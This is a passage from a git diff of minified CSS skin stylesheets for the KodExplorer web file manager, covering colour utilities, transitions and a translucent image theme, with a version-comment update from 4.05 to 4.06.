ft:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}.text-color-set{color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;}@media screen and (max-width:100000px){body{ position:absolute;top:0px;left:0px;bottom:0px;right:0px;} body .x-folder{ background-image:url("../../images/file_icon/icon_others/folder_alpha.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_alpha.png',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_alpha.png',sizingMethod='scale');} body .full-background{ position:absolute;top:0px;left:0px;bottom:0px;right:0px;background:#2d2d2d url('./../../images/wall_page/10.jpg');background-size:cover;background-size:100% 100%;} body .full-background:before{ width:100%;height:100%;display:block;content:" ";background:#2d2d2d url('./../../images/wall_page/10.jpg');background-size:cover;background-size:100% 100%;filter:url(blur.svg#full-background);-webkit-filter:blur(10px);-moz-filter:blur(10px);-ms-filter:blur(10px);filter:blur(10px);} body .btn .font-icon, body .btn.btn-default .font-icon{ color:rgba(255,255,255,0.8);} body .aui-outer .btn .font-icon, body .edit-main .btn .font-icon{ color:#999;} body .common-footer{ background:rgba(234,234,234,0.1);color:rgba(255,255,255,0.6);border-top:1px solid rgba(234,234,234,0.15);} body .common-footer a{ color:rgba(255,255,255,0.8);} body .context-menu-list{ box-shadow:0 10px 40px rgba(0,0,0,0.4);border-radius:0;background:rgba(255,255,255,0.95);} body .context-menu-list .context-menu-item{ line-height:25px;height:25px;padding:0 15px 0 20px;} body .aui-outer{ *border:1px solid #ccc;border:1px solid #ccc \0/IE9;box-shadow:0px 5px 20px rgba(0,0,0,0.5), 0 0 0 1px rgba(255,255,255,0.2);} body .aui-state-focus .aui-outer{ box-shadow:0px 5px 30px rgba(0,0,0,0.7), 0 0 0 1px rgba(255,255,255,0.2);} body .aui-buttons{ border-top:1px solid rgba(255,255,255,0.2);} body div.dialog-simple .aui-title{ border-radius:0;} body .aui-buttons button.aui-state-highlight{ background:linear-gradient(to right,#44abf6,#2865e2);} body .aui-state-focus .aui-title, body .aui-title{ background-color:rgba(0,0,0,0.8);box-shadow:0 1px 0 rgba(255,255,255,0.15);background:#2d2d2d url('./../../images/wall_page/10.jpg');background-size:cover;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;opacity:0.95;} body .dropdown-menu > li > a:hover, body .dropdown-menu .this a, body .dropdown-menu > li > a:focus{ background:linear-gradient(to right,#44abf6,#2865e2);} body .topbar{ background:rgba(234,234,234,0.23);box-shadow:0 0 6px rgba(0,0,0,0.2);border-bottom:1px solid rgba(255,255,255,0.01);border:none;} body .topbar .content{ border-bottom:none;} body .topbar .content .topbar-menu{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border-color:rgba(234,234,234,0.05);} body .topbar .content .open .topbar-menu, body .topbar .content .topbar-menu:hover, body .topbar .content .topbar-menu.this{ background:rgba(234,234,234,0.23);} body .topbar .content .share-title, body .topbar .content .share-info, body .topbar .content .share-info .time{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .topbar .content .top-right div.share-info-user{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .frame-main{ background:rgba(221,221,221,0.02);} body .frame-main .frame-right .frame-right-main .tools{ background:rgba(221,221,221,0.02);border-bottom:1px solid rgba(234,234,234,0.15);box-shadow:1px 2px 15px rgba(0,0,0,0.2);} body .frame-main .frame-right .frame-right-main .tools .font-icon{ color:#fff;} body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size:hover .dropdown-toggle, body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size.open .dropdown-toggle{ background:rgba(234,234,234,0.23);color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider .slider-bg{ background:#666;} body .frame-main .frame-right .file-select-info{ background:#000;background:rgba(0,0,0,0.2);color:#aaa;opacity:0.5;filter:alpha(opacity=50);} body div.frame-header{ background:rgba(221,221,221,0.02);border-bottom:1px solid rgba(234,234,234,0.05);} body div.frame-main .frame-left{ background:rgba(221,221,221,0.02);border-right:1px solid rgba(234,234,234,0.15);} body div.frame-main .frame-left .bottom-box{ background:rgba(221,221,221,0.02);border-right:none;border-top:1px solid rgba(234,234,234,0.15);} body div.frame-main .frame-left .bottom-box .cell{ background:rgba(221,221,221,0.02);color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border:1px solid rgba(234,234,234,0.05);box-shadow:0 0 10px rgba(0,0,0,0.1);} body div.frame-main .frame-left .bottom-box .cell:hover{ background:rgba(234,234,234,0.16);} body .user-space-info{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .group-space-use{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.15);} body .btn-default{ text-shadow:none;} body #btn-history-back, body #home, body #fav{ border-right-color:transparent;} body .btn#home{ border-radius:3px 0 0 3px;} body .btn#up, body .btn#search{ border-radius:0 3px 3px 0;} body .input-style{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .frame-header .header-content .header-right input, body .frame-header .header-content .header-right input:focus{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .frame-header .header-content .header-right input{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .button-style{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .button-style:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .button-style:active, body .button-style.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .frame-main .frame-right .frame-right-main .tools button.btn, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn, body .frame-header .header-content button.btn, body .frame-header .header-content .header-right .btn-default, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .frame-main .frame-right .frame-right-main .tools button.btn:hover, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn:hover, body .frame-header .header-content button.btn:hover, body .frame-header .header-content .header-right .btn-default:hover, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .frame-main .frame-right .frame-right-main .tools button.btn:active, body .frame-main .frame-right .frame-right-main .tools button.btn.active, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn:active, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn.active, body .frame-header .header-content button.btn:active, body .frame-header .header-content button.btn.active, body .frame-header .header-content .header-right .btn-default:active, body .frame-header .header-content .header-right .btn-default.active, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path:active, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .header-middle .btn-default{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .header-middle .btn-default:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .header-middle .btn-default:active, body .header-middle .btn-default.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .header-middle .disable .font-icon{ opacity:0.6;filter:alpha(opacity=60);} body .header-middle #yarnball{ border-right-color:transparent;background:none;border:1px solid rgba(234,234,234,0.23);box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .header-middle #yarnball-input input.path{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .header-middle #yarnball-input{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .header-middle #yarnball .yarnball .yarnlet a{ background:none;color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .header-middle #yarnball .yarnball .yarnlet a::after{ content:'/';padding-left:5px;} body .header-middle #yarnball .yarnball .yarnlet a:hover{ color:rgba(234,234,234,0.23);} body .header-middle #yarnball .yarnball .yarnlet a.curDropToPath{ color:#f60;} body .header-middle #yarnball .yarnball .yarnlet a, body .header-middle #yarnball .yarnball .yarnlet a:link, body .header-middle #yarnball .yarnball .yarnlet a:visited{ padding:0px 8px 0px 8px;margin-left:-10px;} body .header-middle #yarnball .yarnball .yarnlet .left-yarn{ background:none;} body .frame-header .header-content .btn-default:active, body .frame-header .header-content .btn-default.active{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.15);} body .file-draging.file-list-icon div.file .filename, body .file-draging.file-list-list div.file .filename, body .file-draging.file-list-split div.file .filename{ visibility:hidden;} body .file-draging.file-list-icon div.file.handle_target .filename, body .file-draging.file-list-list div.file.handle_target .filename, body .file-draging.file-list-split div.file.handle_target .filename{ visibility:visible;} body .file-list-icon .file{ color:#fff;} body .file-list-list .file{ border-bottom:1px solid rgba(234,234,234,0.05);} body .file-list-list .file.file2{ background:rgba(221,221,221,0.02);} body .file-continer .file, body .file-continer .file2{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;text-shadow:0 0 1px #fff;} body .file-continer .file.hover, body .file-continer .file.select-split-parent, body .file-continer .file2.hover, body .file-continer .file2.select-split-parent{ filter:none;background:rgba(234,234,234,0.1);border:1px solid rgba(234,234,234,0.1);} body .file-continer .file.select, body .file-continer .file.file-select-drag-temp, body .file-continer .file2.select, body .file-continer .file2.file-select-drag-temp{ background:rgba(234,234,234,0.16);border:1px solid rgba(234,234,234,0.23);border-bottom:1px solid rgba(234,234,234,0.23);} body .file-list-split .split-box{ border-right:1px solid #e6e6e6;border-right:1px solid rgba(150,150,150,0.15);} body .file-list-split .split-box.split-hover{ background:rgba(5,5,5,0.2);background:rgba(0,0,0,0.01);box-shadow:0 0 100px rgba(5,5,5,0.2) inset;border-bottom-color:rgba(255,255,255,0.2);} body .file-list-split .split-box.split-select{ background:rgba(0,0,0,0.2);background:rgba(0,0,0,0.01);box-shadow:0 0 100px rgba(0,0,0,0.2) inset;border-left:1px solid #eee;border-color:rgba(0,0,0,0.2);margin-left:-1px;border-bottom:5px solid #2196F3;border-bottom-color:rgba(255,255,255,0.4);} body .file-list-split .file .children-open{ background:rgba(255,255,255,0.01);} body .file-list-split .file .children-open i.font-icon{ color:#fff;} body .context-menu-list .context-menu-item.hover{ background:linear-gradient(to right,#44abf6,#2865e2);} body #list-type-header{ background:none;} body #main-title{ background:rgba(234,234,234,0.1);border-bottom:1px solid rgba(234,234,234,0.15);box-shadow:0px 5px 5px rgba(0,0,0,0.05);} body #main-title .this{ background:rgba(234,234,234,0.16);} body #main-title .filename, body #main-title .filesize, body #main-title .filetype, body #main-title .filetime{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border-right:1px solid rgba(234,234,234,0.23);} body #main-title .filename:hover, body #main-title .filesize:hover, body #main-title .filetype:hover, body #main-title .filetime:hover{ background:rgba(234,234,234,0.16);} body#page-editor .frame-main .tools-left{ background:rgba(234,234,234,0.15);border-bottom:1px solid rgba(234,234,234,0.05);} body#page-editor .frame-main .tools-left a{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body#page-editor .frame-main .frame-right .frame-right-main .frame{ border-left:1px solid rgba(234,234,234,0.05);} body #body .menu-left, body #body .app-menu-left{ background:rgba(230,230,230,0.2);background:#2d2d2d url('./../../images/wall_page/10.jpg');background-size:cover;} body #body .menu-left h1, body #body .app-menu-left h1{ color:#fff;font-weight:400;} body #body .menu-left .setting a, body #body .app-menu-left .setting a{ color:#fff;} body #body .menu-left .setting a:hover, body #body .app-menu-left .setting a:hover{ background:rgba(242,242,242,0.2);} body #body .menu-left .setting a.selected, body #body .app-menu-left .setting a.selected{ background:rgba(255,255,255,0.2);border-color:rgba(255,255,255,0.7);color:#fff;} body #body .menu-left .line, body #body .app-menu-left .line{ color:#fff;border-color:#aaa;border-color:rgba(255,255,255,0.3);} body #body .user-list a{ color:#2a6496;} body #body .system-content .left-frame .left-content .ztree li a{ text-shadow:none;} body #body .system-content .left-frame .left-content .ztree li a.hover{ background:#eee;border-color:#eee;} body #body .system-content .left-frame .left-content .ztree li a.curSelectedNode{ background:#63acff;border:1px solid #63acff;} body#page-explorer .task-tab, body#page-editor .task-tab{ background:rgba(255,255,255,0.2);border-color:rgba(255,255,255,0.3);} body .ztree li a{ color:#fff;border-radius:3px;margin:0 4px 0 4px;background:transparent;border-color:transparent;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .ztree li a:hover{ background:rgba(234,234,234,0.15);border-color:transparent;} body .ztree li a span.button.switch{ opacity:0.8;filter:alpha(opacity=80);} body .ztree li a span.button.switch:after{ color:#cccccc;} body .ztree li a span.button.switch.noline_open:after, body .ztree li a span.button.switch.noline_open_hover:after{ color:#e6e6e6;} body .ztree li a.curSelectedNode, body .ztree li a.curDropTreeNode{ background:rgba(234,234,234,0.33);border-color:transparent;} body .ztree li a.curSelectedNode .noline_open:after, body .ztree li a.curSelectedNode .noline_open_hover:after, body .ztree li a.curSelectedNode .noline_close:after, body .ztree li a.curDropTreeNode .noline_open:after, body .ztree li a.curDropTreeNode .noline_open_hover:after, body .ztree li a.curDropTreeNode .noline_close:after{ color:#fff !important;} body .ztree.group-list-tree li a{ color:#444;text-shadow:none;} body.setting-page .ztree li a{ color:inherit;}} -/* ver 4.05(2017-08-26) [build 1503738071.8144] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.6926] */ \ No newline at end of file diff --git a/static/style/skin/alpha_image_sun.css b/static/style/skin/alpha_image_sun.css index 5e6b631..ea4cb50 100755 --- a/static/style/skin/alpha_image_sun.css +++ b/static/style/skin/alpha_image_sun.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.6485] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.5251] */ body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, 